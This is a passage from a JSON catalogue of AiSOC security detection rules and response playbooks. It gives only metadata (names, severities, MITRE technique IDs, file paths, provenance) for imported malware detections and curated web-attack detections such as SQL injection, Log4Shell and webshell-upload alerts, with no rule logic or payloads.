language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "yispecter_malware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/yispecter_malware_detection.yaral" } }, { "id": "chronicle-detection-rules-zebrocy-tool-apt28-sysmon", "type": "detection", "name": "zebrocy_tool_apt28_sysmon", "description": "zebrocy_tool_apt28_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zebrocy-tool-apt28-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zebrocy_tool_apt28_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/zebrocy_tool_apt28__sysmon.yaral" } }, { "id": "chronicle-detection-rules-zombieboy-cryptomining-worm-sysmon", "type": "detection", "name": "zombieboy_cryptomining_worm_sysmon", "description": "zombieboy_cryptomining_worm_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zombieboy-cryptomining-worm-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zombieboy_cryptomining_worm_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/zombieboy_cryptomining_worm__sysmon.yaral" } }, { "id": "chronicle-detection-rules-zoom-and-microsoft-malware-attacks-detection", "type": "detection", "name": "zoom_and_microsoft_malware_attacks_detection", "description": "zoom_and_microsoft_malware_attacks_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zoom-and-microsoft-malware-attacks-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zoom_and_microsoft_malware_attacks_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/zoom_and_microsoft_malware_attacks_detection.yaral" } }, { "id": "chronicle-detection-rules-zoom-phishing-email-fake-zoom-login-page-credential-stealer", "type": "detection", "name": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "description": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zoom-phishing-email-fake-zoom-login-page-credential-stealer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zoom_phishing_email_fake_zoom_login_page__credential_stealer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/zoom_phishing_email__fake_zoom_login_page___credential_stealer.yaral" } }, { "id": "chronicle-detection-rules-zusy-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "zusy_malware_detector_sysmon_behavior_august_2019", "description": "zusy_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/zusy-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "zusy_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/zusy_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "cloud-takeover-response-v1", "type": "detection", "name": "Cloud Account Takeover Response", "description": "Responds to cloud account takeover or unauthorized IAM activity. Disables compromised credentials, revokes suspicious API keys, audits recent API calls, and alerts the cloud security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "cloud", "account-takeover", "iam", "aws", "gcp", "azure" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/cloud-takeover-response.yaml" }, { "id": "community-aisoc-hello-hunt-aws-root-login", "type": "detection", "name": "[Hello Hunt] AWS Root Account Console Login", "description": "Tutorial detection from apps/docs/docs/detections/hello-hunt.md.\nFires when AWS CloudTrail records a successful console login under the\n`Root` user identity. Real environments should keep the AWS root account\nunused except for break-glass \u2014 any successful console login is worth a\nhuman eyeballing.\n\nThis rule is intentionally minimal so first-time contributors can read\nit end to end. See `apps/docs/docs/detections/hello-hunt.md` for a full\nwalkthrough.", "version": "1.0.0", "author": "AiSOC Tutorial", "tags": [ "tlp.white", "tutorial" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": false, "source": "community", "tier": "community", "enabled": true, "path": "detections/community/cloud/hello-hunt-aws-root-login.yaml" }, { "id": "container-escape-response-v1", "type": "detection", "name": "Container Escape Response", "description": "Responds to detected container escape attempts or privileged container misuse. Terminates the offending container, cordons the node, captures runtime forensics, and alerts the platform security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "container", "kubernetes", "docker", "escape", "runtime-security" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/container-escape-response.yaml" }, { "id": "critical-vulnerability-response-v1", "type": "detection", "name": "Critical Vulnerability Response", "description": "Responds to critical CVEs (CVSS >= 9.0) affecting production systems. Triggers emergency patch workflows, scans for exploitation indicators, applies virtual patching via WAF/IPS where possible, and escalates to the vulnerability management team with a remediation deadline.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "vulnerability", "cve", "patch-management", "critical", "vuln-management" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/critical-vulnerability-response.yaml" }, { "id": "det-application-001", "type": "detection", "name": "SQL Injection Attempt in HTTP Query", "description": "Detects HTTP requests containing common SQL injection payload patterns in query strings or POST bodies. Strong indicator of automated probing or active exploitation against web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/sql-injection-attempt.yaml" }, { "id": "det-application-002", "type": "detection", "name": "Cross-Site Scripting Attempt", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Cross-Site Scripting Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/xss-attempt.yaml" }, { "id": "det-application-003", "type": "detection", "name": "Path Traversal Attempt in HTTP Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Path Traversal Attempt in HTTP Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1083" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/path-traversal.yaml" }, { "id": "det-application-004", "type": "detection", "name": "SSRF Attempt to Cloud Metadata Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SSRF Attempt to Cloud Metadata Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190", "T1212" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/ssrf-attempt.yaml" }, { "id": "det-application-005", "type": "detection", "name": "Log4Shell JNDI Pattern in HTTP Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Log4Shell JNDI Pattern in HTTP Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/log4shell.yaml" }, { "id": "det-application-006", "type": "detection", "name": "Webshell File Upload Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Webshell File Upload Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1505.003" ], "log_source": "waf", "playbook": "tpl-webshell", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/webshell-upload.yaml" }, { "id": "det-application-007", "type": "detection", "name": "OS Command Injection in HTTP Parameter", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'OS Command Injection in HTTP Parameter'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1059" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/command-injection.yaml" }, { "id": "det-application-008", "type": "detection", "name": "Rate Limit Burst on Authentication Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Rate Limit Burst on Authentication Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1110" ], "log_source": "waf", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/rate-limit-burst.yaml" }, { "id": "det-application-009", "type": "detection", "name": "GraphQL Introspection Query in Production", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Introspection Query in Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "application", "mitre_techniques": [ "T1592" ], "log_source": "waf", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/graphql-introspection.yaml" }, { "id": "det-application-010", "type": "detection", "name": "Hard-Coded API Key Pattern Leaked in HTTP Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Hard-Coded API Key Pattern Leaked in HTTP Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1552.001" ], "log_source": "waf", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-key-leak-in-request.yaml" }, { "id": "det-application-011", "type": "detection", "name": "Known-Bad Scanner User-Agent", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Known-Bad Scanner User-Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "application", "mitre_techniques": [ "T1595.002" ], "log_source": "waf", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/user-agent-known-tool.yaml" }, { "id": "det-application-012", "type": "detection", "name": "JWT With alg=none in Authorization Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'JWT With alg=none in Authorization Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1078" ], "log_source": "waf", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/jwt-none-alg.yaml" }, { "id": "det-application-013", "type": "detection", "name": "Open Redirect Pattern in URL Parameter", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Open Redirect Pattern in URL Parameter'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1204.001" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/open-redirect.yaml" }, { "id": "det-application-014", "type": "detection", "name": "Build Pipeline Fetched Public Package With Internal Name", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Build Pipeline Fetched Public Package With Internal Name'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "build", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/dependency-confusion-fetch.yaml" }, { "id": "det-application-015", "type": "detection", "name": "Secret-Pattern Match in CI Job Log", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Secret-Pattern Match in CI Job Log'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1552.001" ], "log_source": "ci", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/ci-secret-printed-to-log.yaml" }, { "id": "det-application-016", "type": "detection", "name": "Push to Protected Branch by Non-Admin", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Push to Protected Branch by Non-Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/github-protected-branch-bypass.yaml" }, { "id": "det-application-017", "type": "detection", "name": "Internal Repository Made Public", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Internal Repository Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "github", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/github-public-repo-flip.yaml" }, { "id": "det-application-018", "type": "detection", "name": "Kubernetes Pulled Image From Untrusted Registry", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Kubernetes Pulled Image From Untrusted Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "kubernetes", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/container-image-pulled-untrusted-registry.yaml" }, { "id": "det-application-019", "type": "detection", "name": "Sequential ID Enumeration Pattern Against API", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Sequential ID Enumeration Pattern Against API'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1592" ], "log_source": "waf", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-mass-enumeration-ids.yaml" }, { "id": "det-application-020", "type": "detection", "name": "API Returned Object Outside Caller's Tenant", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'API Returned Object Outside Caller's Tenant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1212" ], "log_source": "app", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/api-permission-bypass-idor.yaml" }, { "id": "det-application-021", "type": "detection", "name": "POST Without Referer/Origin to Sensitive Endpoint", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'POST Without Referer/Origin to Sensitive Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/csrf-on-sensitive-mutation.yaml" }, { "id": "det-application-022", "type": "detection", "name": "Java/Python Deserialization Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Java/Python Deserialization Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-webattack", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/deserialization-attack.yaml" }, { "id": "det-application-023", "type": "detection", "name": "GitLab Runner Registered as Shared Without Approval", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GitLab Runner Registered as Shared Without Approval'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "gitlab", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/gitlab-runner-shared-tag.yaml" }, { "id": "det-application-024", "type": "detection", "name": "SaaS File Mass Public-Share by Single User", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SaaS File Mass Public-Share by Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "google-workspace", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/saas-mass-share-public.yaml" }, { "id": "det-application-025", "type": "detection", "name": "Slack Token Posted in Public Channel", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack Token Posted in Public Channel'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1552.004" ], "log_source": "slack", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/slack-token-exposed.yaml" }, { "id": "det-application-026", "type": "detection", "name": "Marketplace App Installed With Broad Scopes", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Marketplace App Installed With Broad Scopes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1098.001" ], "log_source": "google-workspace", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/saas-app-installed.yaml" }, { "id": "det-application-027", "type": "detection", "name": "Process Reading Browser Login Database", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Process Reading Browser Login Database'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1555.003" ], "log_source": "edr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/browser-credential-grabber.yaml" }, { "id": "det-application-028", "type": "detection", "name": "Outbound RDP Connection Initiated From Workstation to Internet", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Outbound RDP Connection Initiated From Workstation to Internet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1572" ], "log_source": "ndr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/rdp-tickling.yaml" }, { "id": "det-application-029", "type": "detection", "name": "Microsoft 365 Brand Impersonation Phishing URL", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Microsoft 365 Brand Impersonation Phishing URL'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1566.002" ], "log_source": "email", "playbook": "tpl-phishing", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/phishing-ms365-impersonation.yaml" }, { "id": "det-application-030", "type": "detection", "name": "Email Attachment with Double Extension Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Email Attachment with Double Extension Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1566.001" ], "log_source": "email", "playbook": "tpl-phishing", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/phishing-attachment-double-extension.yaml" }, { "id": "det-application-031", "type": "detection", "name": "Server-Side Template Injection Pattern In Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Server-Side Template Injection Pattern In Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-ssti-pattern.yaml" }, { "id": "det-application-032", "type": "detection", "name": "XML External Entity Reference In Request Body", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'XML External Entity Reference In Request Body'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-xxe-pattern.yaml" }, { "id": "det-application-033", "type": "detection", "name": "NoSQL Injection Operator In Request", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'NoSQL Injection Operator In Request'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-nosql-injection.yaml" }, { "id": "det-application-034", "type": "detection", "name": "GraphQL Introspection Query Against Production", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Introspection Query Against Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1213" ], "log_source": "api-gateway", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-introspection.yaml" }, { "id": "det-application-035", "type": "detection", "name": "GraphQL Query With Excessive Recursion Depth", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Query With Excessive Recursion Depth'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1499" ], "log_source": "api-gateway", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-deep-recursion.yaml" }, { "id": "det-application-036", "type": "detection", "name": "JNDI LDAP Lookup Pattern (Log4Shell-Style)", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'JNDI LDAP Lookup Pattern (Log4Shell-Style)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-jndi-log4shell.yaml" }, { "id": "det-application-037", "type": "detection", "name": "Spring4Shell Class Loader Manipulation Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Spring4Shell Class Loader Manipulation Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-spring4shell-pattern.yaml" }, { "id": "det-application-038", "type": "detection", "name": "Java/.NET Deserialization Marker In Body", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Java/.NET Deserialization Marker In Body'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1059" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-deserialization-rce-marker.yaml" }, { "id": "det-application-039", "type": "detection", "name": "Session Cookie Failed HMAC Verification", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Session Cookie Failed HMAC Verification'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1185" ], "log_source": "application", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-cookie-tampered-hmac.yaml" }, { "id": "det-application-040", "type": "detection", "name": "High Volume Of Password Reset Requests From Single IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'High Volume Of Password Reset Requests From Single IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1110" ], "log_source": "application", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-account-enum-reset.yaml" }, { "id": "det-application-041", "type": "detection", "name": "WebSocket Upgrade From Cross-Origin Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'WebSocket Upgrade From Cross-Origin Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-websocket-origin-bypass.yaml" }, { "id": "det-application-042", "type": "detection", "name": "CRLF Sequence In HTTP Header Value", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CRLF Sequence In HTTP Header Value'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-crlf-header-injection.yaml" }, { "id": "det-application-043", "type": "detection", "name": "CNAME Pointing To Deleted SaaS Tenant", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CNAME Pointing To Deleted SaaS Tenant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1583.001" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-subdomain-takeover-cname.yaml" }, { "id": "det-application-044", "type": "detection", "name": "CORS Response With Wildcard Origin And Credentials Allowed", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CORS Response With Wildcard Origin And Credentials Allowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": 